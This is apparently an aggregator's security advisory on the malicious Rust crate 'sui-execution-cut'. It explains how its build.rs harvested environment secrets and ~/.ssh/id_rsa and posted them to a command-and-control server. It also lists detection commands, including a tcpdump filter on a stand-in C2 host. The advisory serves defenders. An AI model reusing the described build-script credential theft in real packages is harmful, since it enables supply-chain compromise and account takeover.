Listen to this Post
The vulnerability in the `sui-execution-cut` crate is a classic software supply chain attack that abuses Rust’s build script mechanism. When a Rust crate is added as a dependency, Cargo runs a `build.rs` script before compiling the main library. In this case, the published `build.rs` contained hidden malicious instructions. The script executed on the developer’s local machine or on the CI/CD runner, right after `cargo build` was invoked. It did not require any user interaction beyond the normal dependency resolution process. The script was designed to scan the build environment for sensitive data, including environment variables, SSH keys, and files from the `$HOME` directory. After gathering the information, the script established an outbound network connection to a command-and-control (C2) server. The exfiltration likely used standard protocols like HTTP or HTTPS to blend in with legitimate traffic. The communication may have been obfuscated to evade network detection. The payload was specifically tailored to target developers of the Sui blockchain framework. By masquerading as a legitimate execution layer helper, the crate gained a higher chance of being included in a project. The malicious version (0.0.0-0) was published on 2026-04-20 and was available for three days before being reported. The crate was eventually removed from crates.io, but any project that fetched the package during that window was potentially compromised.
DailyCVE Form
Platform: crates.io (cargo)
Version: 0.0.0-0
Vulnerability : Malicious Build Script
Severity: Critical
Date: 2026-05-04
Prediction: Removal/Crate yanked (2026-04-23)
Analytics
What Undercode Say:
Scan Cargo.lock for the malicious crate
grep "sui-execution-cut" Cargo.lock
Check if the build script was ever executed (timestamp evidence)
find target/debug/build/ -name "output" -exec grep -l "sui-execution-cut" {} \;
Query crates.io API for crate details
curl https://crates.io/api/v1/crates/sui-execution-cut
Monitor outbound connections during build (network traffic analysis)
sudo tcpdump -i any -n 'host suspicious-c2.com and port 443'
Exploit:
The attack requires no prerequisites beyond the attacker controlling a `build.rs` script. Once the victim runs cargo build, the script executes. It scans for `ENV` secrets and ~/.ssh/id_rsa, then posts the data to a remote server using a simple web request. The code is hidden within several layers of string obfuscation to avoid automated scanning.
Protection:
- Remove the dependency: Delete `sui-execution-cut = “0.0.0-0″` from
Cargo.toml. - Force re-locking: Run `cargo update` to purge the crate from the registry cache.
- Audit dependencies: Use `cargo audit` to detect known malicious crates.
- Sandbox builds: Execute `cargo build` inside a container or with `build-wrap` to limit network access.
- Block C2 domains: Add known malicious IPs to your firewall blocklist.
Impact:
A successful compromise results in the theft of all environment variables (including CI/CD tokens and API keys), private SSH keys, and potentially source code from the development environment. This leads to full account takeover for the developer’s GitHub, crates.io, and any blockchain wallets used in the build process.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
